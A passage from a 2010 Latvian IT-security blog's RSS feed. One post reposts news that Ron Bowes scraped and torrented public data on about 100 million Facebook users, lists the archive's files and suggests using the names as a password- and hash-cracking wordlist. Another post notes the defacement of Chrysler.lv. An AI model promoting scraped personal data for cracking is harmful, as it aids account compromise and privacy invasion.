		<category><![CDATA[drošības likums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT drošība]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1185</guid>
		<description><![CDATA[Blackhalt blogā pamanīju rakstu par facebook lietotāju publiski pieejamās informācijas apkopošanu. Raksts ar visiem torentu linkiem pieejams šeit http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html
Raksta kopija:
Kāds Ron Bowes lejupielādējis, sistematizējis un publiskojis Facebook publiskās daļas ievērojamu daudzumu lietotāju datus.
Ja nekļūdos, tad savākti ir tikai tie lietotāju dati, kuru saturēja tikai latīņu burtus.
An additional limitation is that these are only users whose [...]]]></description>
			<content:encoded><![CDATA[<p>Blackhalt blogā pamanīju rakstu par facebook lietotāju publiski pieejamās informācijas apkopošanu. Raksts ar visiem torentu linkiem pieejams šeit <a href="http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html">http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html</a></p>
<p>Raksta kopija:</p>
<blockquote><p><code>Kāds Ron Bowes lejupielādējis, sistematizējis un publiskojis Facebook publiskās daļas ievērojamu daudzumu lietotāju datus.<br />
Ja nekļūdos, tad savākti ir tikai tie lietotāju dati, kuru saturēja tikai latīņu burtus.</p>
<p>An additional limitation is that these are only users whose first characters are from the latin charset. I plan to add non-Latin names in future releases.</p>
<p>Lejupielādētie dati tika saarhivēti bz2 datņu formātos un publicēti izmantojot BitTorrent.</p>
<p>Lejupielādējot 2.79 GiB datņu kopu, jebkurš iegūst šādas datnes:</p>
<p>Filename                        Description<br />
-------------------------------------------------------------------------<br />
facebook.rb                     The script used to generate these files (v1)<br />
facebook.nse                    The script that will be used for the second pass (v2)<br />
facebook-urls                   The full URLs to every profile<br />
facebook-names-original         All names, including duplicates<br />
facebook-names-unique           All names, no duplicates<br />
facebook-names-withcount        All names, no duplicates but with a count<br />
facebook-firstnames-withcount   All first names (with count)<br />
facebook-lastnames-withcount    All last names (with count)<br />
facebook-f.last-withcount       All first initial last name (with count)<br />
facebook-first.l-withcount      All first name last initial (with count)</p>
<p>Manuprāt, interesantākie ir facebook-urls (URL no izmantotajiem lietotājiem) un visi vārdi un uzvārdi.</p>
<p>No šīm datnēm var izveidot svaigu un aktuālu (!) vārdnīcu (wordlist) - paroļu, hash utml piemeklēšanai.</p>
<p>Jāpiezīmē, ka atarhivējot kādu no bz2 datnēm, to izmērs var sasniegt vairākus GiB tīra teksta, piemēram, facebook-urls.txt.bz2 ~1.3 GiB būs ~9.7 GiB.<br />
Datņu atvēršanai jāizmanto tādas programmas, kas spēj tādu datu apjomu atvērt pakāpeniski.</p>
<p>Saite uz torrent datni: Facebook directory - personal details for 100 million users (download torrent) - TPB<br />
Saite uz Ron Bowes bloga ierakstu: SkullSecurity » Blog Archive » Return of the Facebook Snatchers.</p>
<p>P.S. Kurš pirmais publicēs analoģiskus datus par draugiem.lv?</code></p></blockquote>
<p>Ko tieši darīt ar šo info nezinu, bet kā saka, lai ir informācija- kā to pielietot izdomāsim.<br />
Kā arī liek aizdomāties par publiskā telpā pieejamās informācijas nekaitīgumu.. jo kas Tev liekas nekaitīgs kādam var izrādīties medusmaize.</p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/lejupieladeti-un-sistematizeti-ap-100-miljonu-facebook-lietotaju-datu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Uzlauzts Chrysler.lv</title>
		<link>http://dll.lv/uzlauzts-chrysler-lv</link>
		<comments>http://dll.lv/uzlauzts-chrysler-lv#comments</comments>
		<pubDate>Mon, 02 Aug 2010 20:54:40 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[pieredze]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1178</guid>
		<description><![CDATA[Šodien pamanīju, ka uzlauzta Chrysler.lv mājaslapa un lai saglabātu piemiņu par šo atgadījumu ierakstīšu nelielu post.
Cik noprotu lapa ir vienkārši nonesta, līdzīgi kā atgadījās ar mani un daudziem citiem.
Interesanti būtu uzzināt chrysler adminu novērojumus un veidu kā tas tika izdarīts, bet kā parasti par to tiks noklusēts  
Ņemot vērā, ka lapa tika atjaunot vismaz rezerves kopija [...]]]></description>
			<content:encoded><![CDATA[<p>Šodien pamanīju, ka uzlauzta Chrysler.lv mājaslapa un lai saglabātu piemiņu par šo atgadījumu ierakstīšu nelielu post.</p>
<p>Cik noprotu lapa ir vienkārši nonesta, līdzīgi kā atgadījās ar mani un daudziem citiem.</p>
<p>Interesanti būtu uzzināt chrysler adminu novērojumus un veidu kā tas tika izdarīts, bet kā parasti par to tiks noklusēts <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Ņemot vērā, ka lapa tika atjaunot vismaz rezerves kopija viņiem bija. Par to arī prieks.</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/08/20100801-chrysler.png"><img class="aligncenter size-medium wp-image-1179" title="20100801-chrysler" src="http://dll.lv/wp-content/uploads/2010/08/20100801-chrysler-300x148.png" alt="" width="300" height="148" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/uzlauzts-chrysler-lv/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
